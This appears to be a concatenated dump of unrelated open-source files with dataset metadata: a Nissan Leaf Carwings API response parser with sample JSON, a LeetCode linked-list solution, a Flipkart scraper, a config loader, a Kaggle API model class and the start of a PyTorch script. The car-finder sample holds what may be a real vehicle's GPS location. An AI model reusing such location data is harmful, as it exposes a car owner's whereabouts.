\"operationResult\": \"START\",\n \"timeStamp\": \"2016-01-02 17:17:38\",\n \"cruisingRangeAcOn\": \"115328.0\",\n \"cruisingRangeAcOff\": \"117024.0\",\n \"currentChargeLevel\": \"0\",\n \"chargeMode\": \"220V\",\n \"pluginState\": \"CONNECTED\",\n \"charging\": \"YES\",\n \"chargeStatus\": \"CT\",\n \"batteryDegradation\": \"10\",\n \"batteryCapacity\": \"12\",\n \"timeRequiredToFull\": {\n \"hours\": \"\",\n \"minutes\": \"\"\n },\n \"timeRequiredToFull200\": {\n \"hours\": \"\",\n \"minutes\": \"\"\n },\n \"timeRequiredToFull200_6kW\": {\n \"hours\": \"\",\n \"minutes\": \"\"\n }\n }\n\n # As at 21/01/2019 for a 30kWh Leaf now seems that\n # BatteryStatusCheckResultRequest.php always returns this\n # regardless of battery status.\n {\n \"status\":200,\n \"responseFlag\":\"0\"\n }\n\n {\n \"status\":200,\n \"message\":\"success\",\n \"responseFlag\":\"1\",\n \"operationResult\":\"START\",\n \"timeStamp\":\"2016-02-14 20:28:45\",\n \"cruisingRangeAcOn\":\"107136.0\",\n \"cruisingRangeAcOff\":\"115776.0\",\n \"currentChargeLevel\":\"0\",\n \"chargeMode\":\"NOT_CHARGING\",\n \"pluginState\":\"QC_CONNECTED\",\n \"charging\":\"YES\",\n \"chargeStatus\":\"CT\",\n \"batteryDegradation\":\"11\",\n \"batteryCapacity\":\"12\",\n \"timeRequiredToFull\":{\n \"hours\":\"\",\n \"minutes\":\"\"\n },\n \"timeRequiredToFull200\":{\n \"hours\":\"\",\n \"minutes\":\"\"\n },\n \"timeRequiredToFull200_6kW\":{\n \"hours\":\"\",\n \"minutes\":\"\"\n }\n }\n\n # As at 22/08/2019 for a 30kWh Leaf now seesm that\n # BatteryStatusCheckResultRequest.php returns data again\n # after polling a number of times.\n {\n \"status\": 200,\n \"responseFlag\": \"1\",\n \"operationResult\": \"START\",\n \"timeStamp\": \"2019-08-22 10:26:51\",\n \"cruisingRangeAcOn\": \"129000.0\",\n \"cruisingRangeAcOff\": \"132000.0\",\n \"currentChargeLevel\": \"0\",\n \"chargeMode\": 
\"NOT_CHARGING\",\n \"pluginState\": \"NOT_CONNECTED\",\n \"charging\": \"NO\",\n \"chargeStatus\": \"0\",\n \"batteryDegradation\": \"180\",\n \"batteryCapacity\": \"240\",\n \"timeRequiredToFull\": {\n \"hours\": \"11\",\n \"minutes\": \"30\"\n },\n \"timeRequiredToFull200\": {\n \"hours\": \"6\",\n \"minutes\": \"30\"\n },\n \"timeRequiredToFull200_6kW\": {\n \"hours\": \"2\",\n \"minutes\": \"30\"\n }\n }\n\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n self._set_timestamp(status)\n self._set_cruising_ranges(status)\n\n self.answer = status\n\n self.battery_capacity = status[\"batteryCapacity\"]\n self.battery_degradation = status[\"batteryDegradation\"]\n\n self.is_connected = (\"NOT_CONNECTED\" != status[\"pluginState\"]) # fun double negative\n self.plugin_state = status[\"pluginState\"]\n\n self.charging_status = status[\"chargeMode\"]\n\n self.is_charging = (\"YES\" == status[\"charging\"])\n\n self.is_quick_charging = (\"RAPIDLY_CHARGING\" == status[\"chargeMode\"])\n self.is_connected_to_quick_charger = (\"QC_CONNECTED\" == status[\"pluginState\"])\n\n self.time_to_full_trickle = timedelta(minutes=_time_remaining(status[\"timeRequiredToFull\"]))\n self.time_to_full_l2 = timedelta(minutes=_time_remaining(status[\"timeRequiredToFull200\"]))\n self.time_to_full_l2_6kw = timedelta(minutes=_time_remaining(status[\"timeRequiredToFull200_6kW\"]))\n\n # For some leafs the battery_percent is not returned\n self.battery_percent = 100 * float(self.battery_degradation) / 12\n\n\nclass CarwingsLatestClimateControlStatusResponse(CarwingsResponse):\n \"\"\"\n climate control on:\n {\n \"status\":200,\n \"message\":\"success\",\n \"RemoteACRecords\":{\n \"OperationResult\":\"START_BATTERY\",\n \"OperationDateAndTime\":\"Feb 10, 2016 10:22 PM\",\n \"RemoteACOperation\":\"START\",\n \"ACStartStopDateAndTime\":\"Feb 10, 2016 10:23 PM\",\n \"CruisingRangeAcOn\":\"107712.0\",\n \"CruisingRangeAcOff\":\"109344.0\",\n \"ACStartStopURL\":\"\",\n \"PluginState\":\"NOT_CONNECTED\",\n \"ACDurationBatterySec\":\"900\",\n \"ACDurationPluggedSec\":\"7200\"\n },\n \"OperationDateAndTime\":\"\"\n }\n\n climate control off:\n {\n \"status\":200,\n \"message\":\"success\",\n \"RemoteACRecords\":{\n \"OperationResult\":\"START\",\n \"OperationDateAndTime\":\"Feb 10, 2016 10:26 PM\",\n \"RemoteACOperation\":\"STOP\",\n \"ACStartStopDateAndTime\":\"Feb 10, 2016 10:27 PM\",\n \"CruisingRangeAcOn\":\"111936.0\",\n \"CruisingRangeAcOff\":\"113632.0\",\n \"ACStartStopURL\":\"\",\n \"PluginState\":\"NOT_CONNECTED\",\n \"ACDurationBatterySec\":\"900\",\n \"ACDurationPluggedSec\":\"7200\"\n },\n \"OperationDateAndTime\":\"\"\n }\n\n error:\n {\n \"status\":200,\n \"RemoteACRecords\":{\n \"OperationResult\":\"ELECTRIC_WAVE_ABNORMAL\",\n \"OperationDateAndTime\":\"2018/04/08 10:00\",\n \"RemoteACOperation\":\"START\",\n \"ACStartStopDateAndTime\":\"08-Apr-2018 11:06\",\n \"ACStartStopURL\":\"\",\n \"PluginState\":\"INVALID\",\n \"ACDurationBatterySec\":\"900\",\n \"ACDurationPluggedSec\":\"7200\",\n \"PreAC_unit\":\"C\",\n \"PreAC_temp\":\"22\"\n }\n }\n noinfo (from a 2014 24kWh Leaf):\n {\n \"status\":200,\n \"RemoteACRecords\":[]\n }\n\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status[\"RemoteACRecords\"])\n racr = status[\"RemoteACRecords\"]\n\n self._set_cruising_ranges(racr, on_key=\"CruisingRangeAcOn\", off_key=\"CruisingRangeAcOff\")\n\n # If no empty RemoteACRecords list is returned then assume CC is off.\n if type(racr) is not dict:\n 
self.is_hvac_running = False\n else:\n # Seems to be running only if both of these contain \"START\".\n self.is_hvac_running = (\n racr[\"OperationResult\"] and\n racr[\"OperationResult\"].startswith(\"START\") and\n racr[\"RemoteACOperation\"] == \"START\"\n )\n\n\nclass CarwingsStartClimateControlResponse(CarwingsResponse):\n \"\"\"\n {\n \"status\":200,\n \"message\":\"success\",\n \"responseFlag\":\"1\",\n \"operationResult\":\"START_BATTERY\",\n \"acContinueTime\":\"15\",\n \"cruisingRangeAcOn\":\"106400.0\",\n \"cruisingRangeAcOff\":\"107920.0\",\n \"timeStamp\":\"2016-02-05 12:59:46\",\n \"hvacStatus\":\"ON\"\n }\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n self._set_timestamp(status)\n self._set_cruising_ranges(status)\n\n self.operation_result = status[\"operationResult\"] # e.g. \"START_BATTERY\", ...?\n self.ac_continue_time = timedelta(minutes=float(status[\"acContinueTime\"]))\n self.hvac_status = status[\"hvacStatus\"] # \"ON\" or \"OFF\"\n self.is_hvac_running = (\"ON\" == self.hvac_status)\n\n\nclass CarwingsStopClimateControlResponse(CarwingsResponse):\n \"\"\"\n {\n \"status\":200,\n \"message\":\"success\",\n \"responseFlag\":\"1\",\n \"operationResult\":\"START\",\n \"timeStamp\":\"2016-02-09 03:32:51\",\n \"hvacStatus\":\"OFF\"\n }\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n self._set_timestamp(status)\n self.hvac_status = status[\"hvacStatus\"] # \"ON\" or \"OFF\"\n self.is_hvac_running = (\"ON\" == self.hvac_status)\n\n\nclass CarwingsClimateControlScheduleResponse(CarwingsResponse):\n \"\"\"\n {\n \"status\":200,\n \"message\":\"success\",\n \"LastScheduledTime\":\"Feb 9, 2016 05:39 PM\",\n \"ExecuteTime\":\"2016-02-10 01:00:00\",\n \"DisplayExecuteTime\":\"Feb 9, 2016 08:00 PM\",\n \"TargetDate\":\"2016/02/10 01:00\"\n }\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n self.display_execute_time = status[\"DisplayExecuteTime\"] # displayable, timezone-adjusted\n self.execute_time = datetime.strptime(status[\"ExecuteTime\"] + \" UTC\", \"%Y-%m-%d %H:%M:%S %Z\") # GMT\n self.display_last_scheduled_time = status[\"LastScheduledTime\"] # displayable, timezone-adjusted\n self.last_scheduled_time = datetime.strptime(status[\"LastScheduledTime\"], \"%b %d, %Y %I:%M %p\")\n # unknown purpose; don't surface to avoid confusion\n # self.target_date = status[\"TargetDate\"]\n\n\nclass CarwingsDrivingAnalysisResponse(CarwingsResponse):\n \"\"\"\n {\n \"status\":200,\n \"message\":\"success\",\n \"DriveAnalysisBasicScreenResponsePersonalData\": {\n \"DateSummary\":{\n \"TargetDate\":\"2016-02-03\",\n \"ElectricMileage\":\"4.4\",\n \"ElectricMileageLevel\":\"3\",\n \"PowerConsumptMoter\":\"295.2\",\n \"PowerConsumptMoterLevel\":\"4\",\n \"PowerConsumptMinus\":\"84.8\",\n \"PowerConsumptMinusLevel\":\"3\",\n \"PowerConsumptAUX\":\"17.1\",\n \"PowerConsumptAUXLevel\":\"5\",\n \"DisplayDate\":\"Feb 3, 16\"\n },\n \"ElectricCostScale\":\"miles/kWh\"\n },\n \"AdviceList\":{\n \"Advice\":{\n \"title\":\"World Number of Trips Rankings (last week):\",\n \"body\":\"The highest number of trips driven was 130 by a driver located in Japan.\"\n }\n }\n }\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n summary = status[\"DriveAnalysisBasicScreenResponsePersonalData\"][\"DateSummary\"]\n\n # avg energy economy, in units of 'electric_cost_scale' (e.g. 
miles/kWh)\n self.electric_mileage = summary[\"ElectricMileage\"]\n # rating for above, scale of 1-5\n self.electric_mileage_level = summary[\"ElectricMileageLevel\"]\n\n # \"acceleration performance\": \"electricity used for motor activation over 1km\", Watt-Hours\n self.power_consumption_moter = summary[\"PowerConsumptMoter\"]\n # rating for above, scale of 1-5\n self.power_consumption_moter_level = summary[\"PowerConsumptMoterLevel\"]\n\n # Watt-Hours generated by braking\n self.power_consumption_minus = summary[\"PowerConsumptMinus\"]\n # rating for above, scale of 1-5\n self.power_consumption_minus_level = summary[\"PowerConsumptMinusLevel\"]\n\n # Electricity used by aux devices, Watt-Hours\n self.power_consumption_aux = summary[\"PowerConsumptAUX\"]\n # rating for above, scale of 1-5\n self.power_consumption_aux_level = summary[\"PowerConsumptAUXLevel\"]\n\n self.display_date = summary[\"DisplayDate\"] # \"Feb 3, 16\"\n\n self.electric_cost_scale = status[\"DriveAnalysisBasicScreenResponsePersonalData\"][\"ElectricCostScale\"]\n\n self.advice = [status[\"AdviceList\"][\"Advice\"]] # will contain \"title\" and \"body\"\n\n\nclass CarwingsLatestBatteryStatusResponse(CarwingsResponse):\n \"\"\"\n # not connected to a charger\n {\n \"status\":200,\n \"message\":\"success\",\n \"BatteryStatusRecords\":{\n \"OperationResult\":\"START\",\n \"OperationDateAndTime\":\"Feb 9, 2016 11:09 PM\",\n \"BatteryStatus\":{\n \"BatteryChargingStatus\":\"NOT_CHARGING\",\n \"BatteryCapacity\":\"12\",\n \"BatteryRemainingAmount\":\"3\",\n \"BatteryRemainingAmountWH\":\"\",\n \"BatteryRemainingAmountkWH\":\"\"\n },\n \"PluginState\":\"NOT_CONNECTED\",\n \"CruisingRangeAcOn\":\"39192.0\",\n \"CruisingRangeAcOff\":\"39744.0\",\n \"TimeRequiredToFull\":{ # 120V\n \"HourRequiredToFull\":\"18\",\n \"MinutesRequiredToFull\":\"30\"\n },\n \"TimeRequiredToFull200\":{ # 240V, 3kW\n \"HourRequiredToFull\":\"6\",\n \"MinutesRequiredToFull\":\"0\"\n },\n \"TimeRequiredToFull200_6kW\":{ # 240V, 6kW\n \"HourRequiredToFull\":\"4\",\n \"MinutesRequiredToFull\":\"0\"\n },\n \"NotificationDateAndTime\":\"2016/02/10 04:10\",\n \"TargetDate\":\"2016/02/10 04:09\"\n }\n }\n\n # not connected to a charger - as at 21/01/2019 20:01 (for a 30kWh leaf)\n {\n \"status\":200,\n \"BatteryStatusRecords\": {\n \"OperationResult\":\"START\",\n \"OperationDateAndTime\":\"21-Jan-2019 13:29\",\n \"BatteryStatus\":{\n \"BatteryChargingStatus\":\"NOT_CHARGING\",\n \"BatteryCapacity\":\"240\",\n \"BatteryRemainingAmount\":\"220\",\n \"BatteryRemainingAmountWH\":\"24480\",\n \"BatteryRemainingAmountkWH\":\"\",\n \"SOC\":{\n \"Value\":\"91\"\n }\n },\n \"PluginState\":\"NOT_CONNECTED\",\n \"CruisingRangeAcOn\":\"146000\",\n \"CruisingRangeAcOff\":\"168000\",\n \"TimeRequiredToFull\":{\n \"HourRequiredToFull\":\"4\",\n \"MinutesRequiredToFull\":\"30\"\n },\n \"TimeRequiredToFull200\":{\n \"HourRequiredToFull\":\"3\"\n ,\"MinutesRequiredToFull\":\"0\"\n },\n \"TimeRequiredToFull200_6kW\":{\n \"HourRequiredToFull\":\"1\",\n \"MinutesRequiredToFull\":\"30\"\n },\n \"NotificationDateAndTime\":\"2019/01/21 13:29\",\n \"TargetDate\":\"2019/01/21 13:29\"\n }\n }\n\n\n # connected to a quick charger\n {\n \"status\":200,\n \"message\":\"success\",\n \"BatteryStatusRecords\":{\n \"OperationResult\":\"START\",\n \"OperationDateAndTime\":\"Feb 14, 2016 03:28 PM\",\n \"BatteryStatus\":{\n \"BatteryChargingStatus\":\"RAPIDLY_CHARGING\",\n \"BatteryCapacity\":\"12\",\n \"BatteryRemainingAmount\":\"11\",\n \"BatteryRemainingAmountWH\":\"\",\n 
\"BatteryRemainingAmountkWH\":\"\"\n },\n \"PluginState\":\"QC_CONNECTED\",\n \"CruisingRangeAcOn\":\"107136.0\",\n \"CruisingRangeAcOff\":\"115776.0\",\n \"NotificationDateAndTime\":\"2016/02/14 20:28\",\n \"TargetDate\":\"2016/02/14 20:28\"\n }\n }\n\n # connected to a charging station\n {\n \"status\": 200,\n \"message\": \"success\",\n \"BatteryStatusRecords\": {\n \"OperationResult\": \"START\",\n \"OperationDateAndTime\": \"Feb 19, 2016 12:12 PM\",\n \"BatteryStatus\": {\n \"BatteryChargingStatus\": \"NORMAL_CHARGING\",\n \"BatteryCapacity\": \"12\",\n \"BatteryRemainingAmount\": \"12\",\n \"BatteryRemainingAmountWH\": \"\",\n \"BatteryRemainingAmountkWH\": \"\"\n },\n \"PluginState\": \"CONNECTED\",\n \"CruisingRangeAcOn\": \"132000.0\",\n \"CruisingRangeAcOff\": \"134000.0\",\n \"TimeRequiredToFull200_6kW\": {\n \"HourRequiredToFull\": \"0\",\n \"MinutesRequiredToFull\": \"40\"\n },\n \"NotificationDateAndTime\": \"2016/02/19 17:12\",\n \"TargetDate\": \"2016/02/19 17:12\"\n }\n }\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status[\"BatteryStatusRecords\"])\n self.answer = status\n\n recs = status[\"BatteryStatusRecords\"]\n\n bs = recs[\"BatteryStatus\"]\n self.battery_capacity = bs[\"BatteryCapacity\"]\n self.battery_remaining_amount = bs[\"BatteryRemainingAmount\"]\n self.charging_status = bs[\"BatteryChargingStatus\"]\n self.is_charging = (\"NOT_CHARGING\" != bs[\"BatteryChargingStatus\"]) # double negatives are fun\n self.is_quick_charging = (\"RAPIDLY_CHARGING\" == bs[\"BatteryChargingStatus\"])\n\n self.plugin_state = recs[\"PluginState\"]\n self.is_connected = (\"NOT_CONNECTED\" != recs[\"PluginState\"]) # another double negative\n self.is_connected_to_quick_charger = (\"QC_CONNECTED\" == recs[\"PluginState\"])\n\n self._set_cruising_ranges(recs, off_key=\"CruisingRangeAcOff\", on_key=\"CruisingRangeAcOn\")\n\n if \"TimeRequiredToFull\" in recs:\n self.time_to_full_trickle = timedelta(minutes=_time_remaining(recs[\"TimeRequiredToFull\"]))\n else:\n self.time_to_full_trickle = None\n\n if \"TimeRequiredToFull200\" in recs:\n self.time_to_full_l2 = timedelta(minutes=_time_remaining(recs[\"TimeRequiredToFull200\"]))\n else:\n self.time_to_full_l2 = None\n\n if \"TimeRequiredToFull200_6kW\" in recs:\n self.time_to_full_l2_6kw = timedelta(minutes=_time_remaining(recs[\"TimeRequiredToFull200_6kW\"]))\n else:\n self.time_to_full_l2_6kw = None\n\n if float(self.battery_capacity) == 0:\n log.debug(\"battery_capacity=0, status=%s\", status)\n self.battery_percent = 0\n else:\n self.battery_percent = 100 * float(self.battery_remaining_amount) / 12\n\n # Leaf 2016 has SOC (State Of Charge) in BatteryStatus, a more accurate battery_percentage\n if \"SOC\" in bs:\n self.state_of_charge = bs[\"SOC\"][\"Value\"]\n # Update battery_percent with more accurate version\n self.battery_percent = float(self.state_of_charge)\n else:\n self.state_of_charge = None\n\n\nclass CarwingsElectricRateSimulationResponse(CarwingsResponse):\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n r = status[\"PriceSimulatorDetailInfoResponsePersonalData\"]\n t = r[\"PriceSimulatorTotalInfo\"]\n\n self.month = r[\"DisplayMonth\"] # e.g. 
\"Feb/2016\"\n\n self.total_number_of_trips = t[\"TotalNumberOfTrips\"]\n self.total_power_consumption = t[\"TotalPowerConsumptTotal\"] # in kWh\n self.total_acceleration_power_consumption = t[\"TotalPowerConsumptMoter\"] # in kWh\n self.total_power_regenerated_in_braking = t[\"TotalPowerConsumptMinus\"] # in kWh\n self.total_travel_distance_km = float(t[\"TotalTravelDistance\"]) / 1000 # assumed to be in meters\n\n self.total_electric_mileage = t[\"TotalElectricMileage\"]\n self.total_co2_reduction = t[\"TotalCO2Reductiont\"] # (yep, extra 't' at the end)\n\n self.electricity_rate = r[\"ElectricPrice\"]\n self.electric_bill = r[\"ElectricBill\"]\n self.electric_cost_scale = r[\"ElectricCostScale\"] # e.g. \"miles/kWh\"\n\n\nclass CarwingsMyCarFinderResponse(CarwingsResponse):\n \"\"\"\n {\n \"Location\": {\n \"Country\": \"\",\n \"Home\": \"OUTSIDE\",\n \"LatitudeDeg\": \"69\",\n \"LatitudeMin\": \"41\",\n \"LatitudeMode\": \"NORTH\",\n \"LatitudeSec\": \"5540\",\n \"LocationType\": \"WGS84\",\n \"LongitudeDeg\": \"18\",\n \"LongitudeMin\": \"38\",\n \"LongitudeMode\": \"EAST\",\n \"LongitudeSec\": \"2506\",\n \"Position\": \"UNAVAILABLE\"\n },\n \"TargetDate\": \"2017/11/29 20:02\",\n \"lat\": \"69.698722222222\",\n \"lng\": \"18.640294444444\",\n \"receivedDate\": \"2017/11/29 20:02\",\n \"responseFlag\": \"1\",\n \"resultCode\": \"1\",\n \"status\": 200,\n \"timeStamp\": \"2017-11-29 20:02:45\"\n }\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n self.latitude = status[\"lat\"]\n self.longitude = status[\"lng\"]\n","repo_name":"snaptec/openWB","sub_path":"modules/soc_leaf/responses.py","file_name":"responses.py","file_ext":"py","file_size_in_byte":26971,"program_lang":"python","lang":"en","doc_type":"code","stars":322,"dataset":"github-code","pt":"81"} +{"seq_id":"17216204018","text":"'''\nYou are given two non-empty linked lists representing two non-negative integers. The digits are stored in reverse order,\nand each of their nodes contains a single digit. 
Add the two numbers and return the sum as a linked list.\n\nYou may assume the two numbers do not contain any leading zero, except the number 0 itself.\n\n\n\nExample 1:\n\nInput: l1 = [2,4,3], l2 = [5,6,4]\nOutput: [7,0,8]\nExplanation: 342 + 465 = 807.\n\nExample 2:\n\nInput: l1 = [0], l2 = [0]\nOutput: [0]\n\nExample 3:\n\nInput: l1 = [9,9,9,9,9,9,9], l2 = [9,9,9,9]\nOutput: [8,9,9,9,0,0,0,1]\n\n\nConstraints:\n\n The number of nodes in each linked list is in the range [1, 100].\n 0 <= Node.val <= 9\n It is guaranteed that the list represents a number that does not have leading zeros.\n\n\n'''\nfrom typing import Optional\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n def __str__(self):\n ln = self\n result = []\n print(\"[\", ln.val, end=\",\")\n result.append(ln.val)\n while ln.next is not None:\n ln = ln.next\n result.append(ln.val)\n print(ln.val, end=\",\")\n print(\"]\")\n return str(result)\n\n\nclass SolutionOne:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n n1 = l1\n num1_s = str(l1.val)\n num1 = int(num1_s)\n while n1.next is not None:\n n1 = n1.next\n num1_s = str(n1.val) + num1_s\n num1 = int(num1_s)\n # print(num1)\n n2 = l2\n num2_s = str(l2.val)\n num2 = int(num2_s)\n while n2.next is not None:\n n2 = n2.next\n num2_s = str(n2.val) + num2_s\n num2 = int(num2_s)\n # print(num2)\n result = num1 + num2\n result_s = str(result)\n # print(result_s)\n prev_node = None\n result_l = ListNode()\n for c in result_s:\n result_l = ListNode(val=int(c), next=prev_node)\n prev_node = result_l\n return result_l\n\n\nif __name__ == '__main__':\n sol = SolutionOne()\n l1 = ListNode(2, next=ListNode(4, next=ListNode(3, None)))\n l2 = ListNode(5, next=ListNode(6, next=ListNode(4, None)))\n output = str(ListNode(7, next=ListNode(0, next=ListNode(8, None))))\n result = str(sol.addTwoNumbers(l1, l2))\n print(\"out\", output)\n print(\"res\", str(result))\n assert output == result\n","repo_name":"rishavpreet/LeetCodeJourney","sub_path":"Medium/Add Two Numbers.py","file_name":"Add Two Numbers.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27649705098","text":"import pandas as pd\nfrom bs4 import BeautifulSoup\nimport csv\nimport requests\nfrom html.parser import HTMLParser\npage_num= input (\"Enter number of page numbers:\")\nfor r in range(1,int(page_num)):\n URL= \"https://www.flipkart.com/search?q=air+fryer&sid=j9e%2Cm38%2Cj1e&as=on&as-show=on&otracker=AS_QueryStore_OrganicAutoSuggest_1_4_na_na_na&otracker1=AS_QueryStore_OrganicAutoSuggest_1_4_na_na_na&as-pos=1&as-type=HISTORY&suggestionId=air+fryer%7CAir+Fryers&requestId=dadfe4e4-56a6-4849-8691-9eeb601df480&page=\"+str(r)\n headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0\"}\n page = requests.get(URL,headers=headers)\n page.raise_for_status()\n soup = BeautifulSoup(page.text,\"html.parser\")\n #print(soup)\n products=[]\n prices=[]\n ratings=[]\n flip_results = soup.find_all('div',{'class':'_4ddWXP'})\n print (len(flip_results))\n for i in flip_results:\n pd_name = i.find('a',{'class':'s1Q9rs'}).text\n print(pd_name)\n price = i.find('div',{'class':'_30jeq3'}).text\n print(price)\n rating = i.span.text\n print(rating)\n products.append(pd_name)\n ratings.append(rating)\n prices.append(price)\n df = pd.DataFrame({'Product 
Name':products,'Prices':prices,'Ratings':ratings})\n df.head()\n df.to_csv('air_fryer.csv')\n\n\n","repo_name":"SrutiVS/scraping","sub_path":"flip1_scrap.py","file_name":"flip1_scrap.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37296252396","text":"import dataclasses\nfrom configparser import ConfigParser\nfrom pathlib import Path\n\nCONFIG_FILE = Path(__file__).parent.parent / \"config.ini\"\n\n\n@dataclasses.dataclass\nclass SerialDevice:\n port: str\n baudrate: int\n\n\ndef config_loader() -> list[SerialDevice]:\n config = ConfigParser()\n config.read(CONFIG_FILE)\n section = config[\"managed devices\"]\n managed_devices: list[SerialDevice] = []\n for d in section:\n port, br = section[d].split(\",\")\n managed_devices.append(SerialDevice(port=port, baudrate=br))\n return managed_devices\n\n\nif __name__ == \"__main__\":\n print(config_loader())\n","repo_name":"va771/mb77-controller","sub_path":"app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11554859438","text":"#!/usr/bin/python\n#\n# Copyright 2023 Kaggle Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# coding: utf-8\r\n\r\n\"\"\"\r\n Kaggle API\r\n\r\n API for kaggle.com # noqa: E501\r\n\r\n OpenAPI spec version: 1\r\n \r\n Generated by: https://github.com/swagger-api/swagger-codegen.git\r\n\"\"\"\r\n\r\n\r\nimport pprint\r\nimport re # noqa: F401\r\n\r\nimport six\r\n\r\n\r\nclass Collaborator(object):\r\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\r\n\r\n Do not edit the class manually.\r\n \"\"\"\r\n\r\n \"\"\"\r\n Attributes:\r\n swagger_types (dict): The key is attribute name\r\n and the value is attribute type.\r\n attribute_map (dict): The key is attribute name\r\n and the value is json key in definition.\r\n \"\"\"\r\n swagger_types = {\r\n 'username': 'str',\r\n 'role': 'str'\r\n }\r\n\r\n attribute_map = {\r\n 'username': 'username',\r\n 'role': 'role'\r\n }\r\n\r\n def __init__(self, username=None, role=None): # noqa: E501\r\n \"\"\"Collaborator - a model defined in Swagger\"\"\" # noqa: E501\r\n\r\n self._username = None\r\n self._role = None\r\n self.discriminator = None\r\n\r\n self.username = username\r\n self.role = role\r\n\r\n @property\r\n def username(self):\r\n \"\"\"Gets the username of this Collaborator. # noqa: E501\r\n\r\n Username of the collaborator # noqa: E501\r\n\r\n :return: The username of this Collaborator. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._username\r\n\r\n @username.setter\r\n def username(self, username):\r\n \"\"\"Sets the username of this Collaborator.\r\n\r\n Username of the collaborator # noqa: E501\r\n\r\n :param username: The username of this Collaborator. 
# noqa: E501\r\n :type: str\r\n \"\"\"\r\n if username is None:\r\n raise ValueError(\"Invalid value for `username`, must not be `None`\") # noqa: E501\r\n\r\n self._username = username\r\n\r\n @property\r\n def role(self):\r\n \"\"\"Gets the role of this Collaborator. # noqa: E501\r\n\r\n Role of the collaborator # noqa: E501\r\n\r\n :return: The role of this Collaborator. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._role\r\n\r\n @role.setter\r\n def role(self, role):\r\n \"\"\"Sets the role of this Collaborator.\r\n\r\n Role of the collaborator # noqa: E501\r\n\r\n :param role: The role of this Collaborator. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n if role is None:\r\n raise ValueError(\"Invalid value for `role`, must not be `None`\") # noqa: E501\r\n allowed_values = [\"reader\", \"writer\"] # noqa: E501\r\n if role not in allowed_values:\r\n raise ValueError(\r\n \"Invalid value for `role` ({0}), must be one of {1}\" # noqa: E501\r\n .format(role, allowed_values)\r\n )\r\n\r\n self._role = role\r\n\r\n def to_dict(self):\r\n \"\"\"Returns the model properties as a dict\"\"\"\r\n result = {}\r\n\r\n for attr, _ in six.iteritems(self.swagger_types):\r\n value = getattr(self, attr)\r\n if isinstance(value, list):\r\n result[attr] = list(map(\r\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\r\n value\r\n ))\r\n elif hasattr(value, \"to_dict\"):\r\n result[attr] = value.to_dict()\r\n elif isinstance(value, dict):\r\n result[attr] = dict(map(\r\n lambda item: (item[0], item[1].to_dict())\r\n if hasattr(item[1], \"to_dict\") else item,\r\n value.items()\r\n ))\r\n else:\r\n result[attr] = value\r\n\r\n return result\r\n\r\n def to_str(self):\r\n \"\"\"Returns the string representation of the model\"\"\"\r\n return pprint.pformat(self.to_dict())\r\n\r\n def __repr__(self):\r\n \"\"\"For `print` and `pprint`\"\"\"\r\n return self.to_str()\r\n\r\n def __eq__(self, other):\r\n \"\"\"Returns true if both objects are equal\"\"\"\r\n if not isinstance(other, Collaborator):\r\n return False\r\n\r\n return self.__dict__ == other.__dict__\r\n\r\n def __ne__(self, other):\r\n \"\"\"Returns true if both objects are not equal\"\"\"\r\n return not self == other\r\n","repo_name":"Kaggle/kaggle-api","sub_path":"kaggle/models/collaborator.py","file_name":"collaborator.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","stars":5653,"dataset":"github-code","pt":"81"} +{"seq_id":"17943367505","text":"import torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport model\nimport transform as tran\nimport adversarial1 as ad\nimport numpy as np\nfrom read_data import ImageList\nimport argparse\nimport os\nimport torch.nn.functional as F\n\n\ntorch.set_num_threads(1)\nparser = argparse.ArgumentParser(description='PyTorch BSP Example')\nparser.add_argument('--gpu_id', type=str, nargs='?', default='0', help=\"device id to run\")\nparser.add_argument('--src', type=str, default='a', metavar='S',\n help='source dataset')\nparser.add_argument('--tgt', type=str, default='d', metavar='S',\n help='target dataset')\nparser.add_argument('--num_iter', type=int, default=50002,\n help='max iter_num')\nargs = parser.parse_args()\n\ndef get_datasetname(args):\n noe = 0\n office = False\n A = './data/Art.txt'\n C = './data/Clipart.txt'\n P = './data/Product.txt'\n R = './data/Real_World.txt'\n if args.src == 'A':\n src = A\n elif args.src == 'C':\n src = C\n elif args.src == 'P':\n src = P\n elif args.src == 'R':\n src = R\n if args.tgt == 'A':\n tgt = 
